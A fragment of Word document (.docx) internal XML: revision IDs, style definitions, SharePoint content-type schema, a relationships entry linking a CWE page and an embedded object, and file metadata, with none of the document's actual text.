    <w:rsid w:val="00B02A48"/>
    <w:rsid w:val="00B0390B"/>
    <w:rsid w:val="00B85BEC"/>
    <w:rsid w:val="00BA1A4B"/>
    <w:rsid w:val="00BA7318"/>
    <w:rsid w:val="00BC12DE"/>
    <w:rsid w:val="00BD0F56"/>
    <w:rsid w:val="00BD4923"/>
    <w:rsid w:val="00BD6154"/>
    <w:rsid w:val="00C01F8B"/>
    <w:rsid w:val="00C13641"/>
    <w:rsid w:val="00C2531B"/>
    <w:rsid w:val="00C31EB9"/>
    <w:rsid w:val="00C47719"/>
    <w:rsid w:val="00C55D51"/>
    <w:rsid w:val="00C615DA"/>
    <w:rsid w:val="00C70ED3"/>
    <w:rsid w:val="00CB052D"/>
    <w:rsid w:val="00CF78EE"/>
    <w:rsid w:val="00D133FE"/>
    <w:rsid w:val="00D14F93"/>
    <w:rsid w:val="00D2185C"/>
    <w:rsid w:val="00D86EF9"/>
    <w:rsid w:val="00D907F9"/>
    <w:rsid w:val="00DB3C26"/>
    <w:rsid w:val="00DC004E"/>
    <w:rsid w:val="00DD48B7"/>
    <w:rsid w:val="00DF47BD"/>
    <w:rsid w:val="00E034D7"/>
    <w:rsid w:val="00E2290A"/>
    <w:rsid w:val="00E34916"/>
    <w:rsid w:val="00E3517A"/>
    <w:rsid w:val="00E459DB"/>
    <w:rsid w:val="00E64972"/>
    <w:rsid w:val="00E850A3"/>
    <w:rsid w:val="00F005BA"/>
    <w:rsid w:val="00F14AD8"/>
    <w:rsid w:val="00F4497B"/>
    <w:rsid w:val="00F57B13"/>
    <w:rsid w:val="00FC616F"/>
    <w:rsid w:val="00FD53B2"/>
    <w:rsid w:val="00FD73CF"/>
    <w:rsid w:val="00FF0BF8"/>
    <w:rsid w:val="3EE847B1"/>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603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03428"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00416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10.5.50.40"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we.mitre.org/data/definitions/502.html" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/><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CED372D81F7F4E9B81EF5B28922A92" ma:contentTypeVersion="7" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="5d0f44e29378ea10f07e3acccdbbe28e">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="99f00f70-e37c-45fc-a58c-25b9fce86e97" xmlns:ns3="76dd32bb-4b56-4927-99ec-3ebca7c2e701" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="a5d8880fbe4e2cabc162d7dcb115af47" ns2:_="" ns3:_="">
    <xsd:import namespace="99f00f70-e37c-45fc-a58c-25b9fce86e97"/>
    <xsd:import namespace="76dd32bb-4b56-4927-99ec-3ebca7c2e7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00f70-e37c-45fc-a58c-25b9fce86e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dd32bb-4b56-4927-99ec-3ebca7c2e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CC38FE-B361-46E4-9894-576FDF981F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customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DA37E3E7-0D26-49B1-B629-3B5A9D0974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f00f70-e37c-45fc-a58c-25b9fce86e97"/>
    <ds:schemaRef ds:uri="76dd32bb-4b56-4927-99ec-3ebca7c2e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0370FA-BFD5-4426-BD94-61BAD2CB3D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15</Pages>
  <Words>1107</Words>
  <Characters>6312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hedau</cp:lastModifiedBy>
  <cp:revision>118</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-11T22:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T01:38:00Z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0x010100C9CED372D81F7F4E9B81EF5B28922A92</vt:lpwstr>
  </property>
</Properties>
</file>